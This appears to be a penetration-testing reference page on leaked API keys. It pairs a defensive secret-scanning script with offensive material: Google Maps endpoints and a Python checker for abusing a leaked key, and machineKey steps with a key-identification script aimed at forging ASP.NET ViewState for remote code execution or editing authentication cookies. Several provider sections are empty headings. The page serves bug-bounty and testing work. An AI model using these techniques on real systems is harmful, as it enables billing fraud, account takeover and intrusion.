API Key Leaks
An API key is a unique identifier used to authenticate requests associated with a project. Developers sometimes hardcode keys in source or leave them on public shares, where anyone who finds them can use them.
Summary
Tools
Exploit
Google Maps
Algolia
Slack API Token
Facebook Access Token
Github client id and client secret
Twilio Account_sid and Auth Token
Twitter API Secret
Twitter Bearer Token
Gitlab Personal Access Token
HockeyApp API Token
IIS Machine Keys
Mapbox API Token
Tools
momenbasel/KeyFinder - a tool that lets you find keys while surfing the web
streaak/keyhacks - is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid
trufflesecurity/truffleHog - Find credentials all over the place
aquasecurity/trivy - General purpose vulnerability and misconfiguration scanner which also searches for API keys/secrets
projectdiscovery/nuclei-templates - Use these templates to test an API token against many API service endpoints
blacklanternsecurity/badsecrets - A library for detecting known or weak secrets across many platforms
mazen160/secrets-patterns-db - Secrets Patterns DB: The largest open-source Database for detecting secrets, API keys, passwords, tokens, and more.
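The scanners above share one approach: fixed patterns for known token shapes plus an entropy heuristic for anything that looks like a credential assignment. The block below is an added example (not code from any of the listed tools) that runs that approach over constructed sample text. The patterns are illustrative shapes for the token families covered on this page, the entropy threshold is a tuning assumption, and none of the sample values is a real credential; secrets-patterns-db carries the maintained ruleset.

```python
import math
import re
from collections import Counter

# Illustrative patterns for token families listed on this page (assumption:
# these follow each provider's documented prefix and length, not a vetted ruleset).
PATTERNS = {
    "google_api_key": re.compile(r"\bAIza[0-9A-Za-z_-]{35}\b"),
    "slack_token": re.compile(r"\bxox[baprs]-[0-9A-Za-z-]{10,}"),
    "github_pat": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
    "gitlab_pat": re.compile(r"\bglpat-[A-Za-z0-9_-]{20}\b"),
    "twilio_account_sid": re.compile(r"\bAC[0-9a-f]{32}\b"),
    "mapbox_secret_token": re.compile(r"\bsk\.eyJ[A-Za-z0-9._-]+"),
    "mapbox_public_token": re.compile(r"\b[pt]k\.eyJ[A-Za-z0-9._-]+"),
}

# Generic fallback (the truffleHog heuristic): a keyword-named assignment whose
# quoted value is long and high-entropy. The 4.0 bits/char threshold is an assumption.
ASSIGNMENT = re.compile(
    r"(?i)(?:api[_-]?key|secret|token|password|passwd|key)\w*\s*[:=]\s*['\"]([^'\"]{16,})['\"]"
)
ENTROPY_THRESHOLD = 4.0


def shannon_entropy(s):
    """Shannon entropy of a string in bits per character."""
    if not s:
        return 0.0
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in Counter(s).values())


def scan(text):
    """Return (line_number, kind, value) for every finding in `text`.

    Specific patterns win; the entropy fallback only reports values that no
    specific pattern already matched on that line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        seen = set()
        for kind, pattern in PATTERNS.items():
            for match in pattern.finditer(line):
                findings.append((lineno, kind, match.group(0)))
                seen.add(match.group(0))
        for match in ASSIGNMENT.finditer(line):
            value = match.group(1)
            if value in seen:
                continue
            if shannon_entropy(value) >= ENTROPY_THRESHOLD:
                findings.append((lineno, "high_entropy_assignment", value))
    return findings


# Constructed sample input for this example; no real credentials.
SAMPLE = "\n".join([
    "# constructed sample config, no real credentials",
    'GOOGLE_MAPS_KEY = "AIzaSyA' + "0" * 32 + '"',
    'slack_hook = "xoxb-000000000000-000000000000-AbCdEfGhIjKlMnOpQrStUvWx"',
    'TWILIO_SID = "AC' + "0" * 32 + '"',
    'MAPBOX = "sk.eyJ1IjoiZXhhbXBsZSIsImEiOiJjazAifQ.AAAAAAAAAAAAAAAAAAAAAA"',
    'DB_PASSWORD = "kJ8q2Lm9vX3pR7tW4nZ1bC5dF6gH0sY2"',
    'DEBUG = "false"',
])

if __name__ == "__main__":
    for lineno, kind, value in scan(SAMPLE):
        print(f"line {lineno}: {kind}: {value[:10]}...")
```

Note what the two halves catch: the constructed Google key is mostly zeros, so the entropy heuristic alone would miss it, while the database password has no recognisable shape and is only caught by entropy. Real scanners combine both for that reason.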
Exploit
The following commands can be used to take over accounts or extract personal information from the API using the leaked token.
Google Maps
Use: https://github.com/ozguralp/gmapsapiscanner/
Usage:
| Name | Endpoint |
|---|---|
| Static Maps | https://maps.googleapis.com/maps/api/staticmap?center=45%2C10&zoom=7&size=400x400&key=KEY_HERE |
| Streetview | https://maps.googleapis.com/maps/api/streetview?size=400x400&location=40.720032,-73.988354&fov=90&heading=235&pitch=10&key=KEY_HERE |
| Embed | https://www.google.com/maps/embed/v1/place?q=place_id:ChIJyX7muQw8tokR2Vf5WBBk1iQ&key=KEY_HERE |
| Directions | https://maps.googleapis.com/maps/api/directions/json?origin=Disneyland&destination=Universal+Studios+Hollywood4&key=KEY_HERE |
| Geocoding | https://maps.googleapis.com/maps/api/geocode/json?latlng=40,30&key=KEY_HERE |
| Distance Matrix | https://maps.googleapis.com/maps/api/distancematrix/json?units=imperial&origins=40.6655101,-73.89188969999998&destinations=40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-73.7527626%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-73.7527626&key=KEY_HERE |
| Find Place from Text | https://maps.googleapis.com/maps/api/place/findplacefromtext/json?input=Museum%20of%20Contemporary%20Art%20Australia&inputtype=textquery&fields=photos,formatted_address,name,rating,opening_hours,geometry&key=KEY_HERE |
| Autocomplete | https://maps.googleapis.com/maps/api/place/autocomplete/json?input=Bingh&types=%28cities%29&key=KEY_HERE |
| Elevation | https://maps.googleapis.com/maps/api/elevation/json?locations=39.7391536,-104.9847034&key=KEY_HERE |
| Timezone | https://maps.googleapis.com/maps/api/timezone/json?location=39.6034810,-119.6822510&timestamp=1331161200&key=KEY_HERE |
| Roads | https://roads.googleapis.com/v1/nearestRoads?points=60.170880,24.942795&key=KEY_HERE |
| Geolocate | https://www.googleapis.com/geolocation/v1/geolocate?key=KEY_HERE |
Impact:
Consuming the company's monthly quota, or running up unauthorized usage that over-bills the service and causes financial damage to the company
Denial of service against the application's mapping features if a maximum billing cap is configured in the Google account: once the cap is reached, legitimate requests fail as well
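An added example, not the page's own code and not gmapsapiscanner: a minimal checker that substitutes a leaked key into a subset of the endpoints tabulated above and classifies each response, so you can tell which APIs the key is enabled for before writing up impact. The classification keys off the status and error_message fields of the Maps web-service JSON responses (and the HTTP status for the image endpoints); the specific message substrings matched are assumptions based on Google's documented error responses. The fetch parameter is there so the logic can be exercised offline; the Geolocation endpoint is a POST with a different error envelope and is left out.

```python
import json
import sys
import urllib.error
import urllib.request

# Subset of the endpoints listed in the table above; KEY_HERE is substituted at scan time.
ENDPOINTS = {
    "Static Maps": "https://maps.googleapis.com/maps/api/staticmap?center=45%2C10&zoom=7&size=400x400&key=KEY_HERE",
    "Streetview": "https://maps.googleapis.com/maps/api/streetview?size=400x400&location=40.720032,-73.988354&fov=90&heading=235&pitch=10&key=KEY_HERE",
    "Directions": "https://maps.googleapis.com/maps/api/directions/json?origin=Disneyland&destination=Universal+Studios+Hollywood&key=KEY_HERE",
    "Geocoding": "https://maps.googleapis.com/maps/api/geocode/json?latlng=40,30&key=KEY_HERE",
    "Elevation": "https://maps.googleapis.com/maps/api/elevation/json?locations=39.7391536,-104.9847034&key=KEY_HERE",
    "Timezone": "https://maps.googleapis.com/maps/api/timezone/json?location=39.6034810,-119.6822510&timestamp=1331161200&key=KEY_HERE",
    "Autocomplete": "https://maps.googleapis.com/maps/api/place/autocomplete/json?input=Bingh&types=%28cities%29&key=KEY_HERE",
    "Roads": "https://roads.googleapis.com/v1/nearestRoads?points=60.170880,24.942795&key=KEY_HERE",
}


def build_urls(key):
    """Substitute the leaked key into every endpoint template."""
    return {name: url.replace("KEY_HERE", key) for name, url in ENDPOINTS.items()}


def http_fetch(url, timeout=10):
    """GET a URL and return (http_status, content_type, body_bytes), also for 4xx/5xx."""
    req = urllib.request.Request(url, headers={"User-Agent": "maps-key-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.headers.get("Content-Type", ""), resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.headers.get("Content-Type", ""), err.read()


def classify(status, content_type, body):
    """Map one response to enabled / enabled_quota_exceeded / restricted / invalid_key / unknown.

    Assumption: Maps web services answer with {"status": ..., "error_message": ...};
    the Roads API answers with {"error": {"code": ..., "message": ..., "status": ...}}."""
    ctype = (content_type or "").lower()
    if "json" in ctype:
        try:
            data = json.loads(body)
        except ValueError:
            return "unknown"
        if not isinstance(data, dict):
            return "unknown"
        if "error" in data:  # Roads-style error envelope
            msg = str(data["error"].get("message", "")).lower()
            return "invalid_key" if ("invalid" in msg or "not valid" in msg) else "restricted"
        st = data.get("status", "")
        msg = str(data.get("error_message", "")).lower()
        if st in ("OK", "ZERO_RESULTS"):
            return "enabled"
        if st in ("OVER_QUERY_LIMIT", "OVER_DAILY_LIMIT"):
            return "enabled_quota_exceeded"  # key accepted, billing/quota already exhausted
        if st == "REQUEST_DENIED":
            return "invalid_key" if "invalid" in msg else "restricted"
        return "unknown:" + str(st)
    # Static Maps and Street View return image bytes on success, an error page otherwise.
    if status == 200:
        return "enabled"
    if status == 403:
        return "restricted"
    return "unknown"


def scan(key, fetch=http_fetch):
    """Probe every endpoint with the key; `fetch` is injectable for offline use."""
    return {name: classify(*fetch(url)) for name, url in build_urls(key).items()}


def any_enabled(report):
    """True if at least one endpoint accepted the key (i.e. it is abusable)."""
    return any(verdict.startswith("enabled") for verdict in report.values())


if __name__ == "__main__":
    report = scan(sys.argv[1])
    for name, verdict in report.items():
        print(f"{name:14s} {verdict}")
    print("key is abusable" if any_enabled(report) else "no endpoint accepted the key")
```

A "restricted" verdict on a JSON endpoint usually means the key is real but either the API is not enabled on the project or the key carries referrer/IP restrictions; "enabled_quota_exceeded" means someone (possibly you) has already burned through the quota, which is exactly the billing impact described above.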
Algolia
Slack API Token
Facebook Access Token
Github client id and client secret
Twilio Account_sid and Auth token
Twitter API Secret
Twitter Bearer Token
Gitlab Personal Access Token
HockeyApp API Token
IIS Machine Keys
The machineKey is used to encrypt and decrypt forms-authentication cookie data and ViewState data, and to validate (MAC) out-of-process session-state identification.
Requirements
machineKey validationKey and decryptionKey
__VIEWSTATEGENERATOR hidden form field (a form parameter, not a cookie; it feeds the MAC modifier)
__VIEWSTATE hidden form field (the MAC-protected, possibly encrypted, serialized page state)
Example of a machineKey from https://docs.microsoft.com/en-us/iis/troubleshoot/security-issues/troubleshooting-forms-authentication.
Common locations of web.config / machine.config
32-bit
C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\machine.config
C:\Windows\Microsoft.NET\Framework\v4.0.30319\config\machine.config
64-bit
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\config\machine.config
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\machine.config
In the registry, when AutoGenerate is enabled (extract with https://gist.github.com/irsdl/36e78f62b98f879ba36f72ce4fda73ab)
HKEY_CURRENT_USER\Software\Microsoft\ASP.NET\4.0.30319.0\AutoGenKeyV4
HKEY_CURRENT_USER\Software\Microsoft\ASP.NET\2.0.50727.0\AutoGenKey
Identify known machine key
Exploit with Blacklist3r/AspDotNetWrapper
Exploit with ViewGen
Decode ViewState
Generate ViewState for RCE
NOTE: Send a POST request with the generated ViewState to the same endpoint, in Burp you should URL Encode Key Characters for your payload.
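An added example, not code from Blacklist3r or ViewGen, covering the "Identify known machine key" and "Decode ViewState" steps above: it recomputes the ViewState MAC under the legacy .NET 2.0-4.0 scheme (HMAC-SHA1 over the serialized state followed by a modifier built from __VIEWSTATEGENERATOR and, if set, the ViewStateUserKey) and reports which of a list of candidate validationKeys validates a captured __VIEWSTATE. The candidate keys, generator and page state here are constructed for the example; Blacklist3r ships the real list of publicly known keys. The MAC layout and modifier construction are assumptions that match the legacy scheme only: .NET 4.5+ with the newer crypto stack derives a purpose-specific key and uses HMAC-SHA256, which this block does not implement.

```python
import base64
import hashlib
import hmac
import struct

# Constructed candidate list for this example; none of these is a known or default key.
CANDIDATE_VALIDATION_KEYS = [
    "0" * 64,
    "A1B2C3D4E5F60718293A4B5C6D7E8F90A1B2C3D4E5F60718293A4B5C6D7E8F90",
    "FEDCBA9876543210FEDCBA9876543210FEDCBA9876543210FEDCBA9876543210",
]
MAC_LEN = 20  # HMAC-SHA1 digest length (assumption: validation="SHA1", the legacy default)


def mac_modifier(generator_hex, user_key=None):
    """Legacy MAC modifier: __VIEWSTATEGENERATOR as a little-endian uint32,
    followed by the ViewStateUserKey (UTF-8) when the application sets one."""
    modifier = struct.pack("<I", int(generator_hex, 16))
    if user_key:
        modifier += user_key.encode("utf-8")
    return modifier


def sign_viewstate(serialized, validation_key_hex, generator_hex, user_key=None):
    """Append the legacy MAC to a serialized page state and base64-encode it."""
    key = bytes.fromhex(validation_key_hex)
    mac = hmac.new(key, serialized + mac_modifier(generator_hex, user_key), hashlib.sha1).digest()
    return base64.b64encode(serialized + mac).decode("ascii")


def split_viewstate(b64):
    """Split a base64 __VIEWSTATE into (serialized_state, mac)."""
    raw = base64.b64decode(b64)
    return raw[:-MAC_LEN], raw[-MAC_LEN:]


def describe(b64):
    """'plain' when the state starts with the LOS format marker 0xFF 0x01
    (readable, even if a MAC follows); otherwise it is encrypted or not ViewState."""
    body, _ = split_viewstate(b64)
    return "plain" if body[:2] == b"\xff\x01" else "encrypted-or-unknown"


def mac_is_valid(b64, validation_key_hex, generator_hex, user_key=None):
    """Recompute the legacy MAC with the candidate key and compare in constant time."""
    body, mac = split_viewstate(b64)
    key = bytes.fromhex(validation_key_hex)
    expected = hmac.new(key, body + mac_modifier(generator_hex, user_key), hashlib.sha1).digest()
    return hmac.compare_digest(mac, expected)


def find_known_key(b64, generator_hex, candidates, user_key=None):
    """Return the first candidate validationKey that validates the MAC, else None.
    A hit means the target runs on a known key and the state can be forged."""
    for candidate in candidates:
        if mac_is_valid(b64, candidate, generator_hex, user_key):
            return candidate
    return None


if __name__ == "__main__":
    generator = "CA0B0334"  # hypothetical __VIEWSTATEGENERATOR value
    state = b"\xff\x01" + b"constructed LOS body, not a real page state"
    captured = sign_viewstate(state, CANDIDATE_VALIDATION_KEYS[1], generator)
    print(describe(captured), find_known_key(captured, generator, CANDIDATE_VALIDATION_KEYS))
```

If the captured state describes as "encrypted-or-unknown", the page has ViewState encryption on and you need the decryptionKey as well; a key that validates the MAC is the one to feed to ysoserial.net or ViewGen when generating the payload for the RCE step above.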
Edit cookies with the machine key
Use this when you have the machineKey but ViewState is disabled on the target: the same validationKey and decryptionKey protect the forms-authentication cookie.
ASP.NET forms authentication cookies: https://github.com/liquidsec/aspnetCryptTools
Mapbox API Token
A Mapbox API token is a JSON Web Token (JWT). The first dot-separated segment (where the JWT header would normally sit) gives the token type: if it is sk (secret key), jackpot; if it is pk (public) or tk (temporary), it's not worth your time.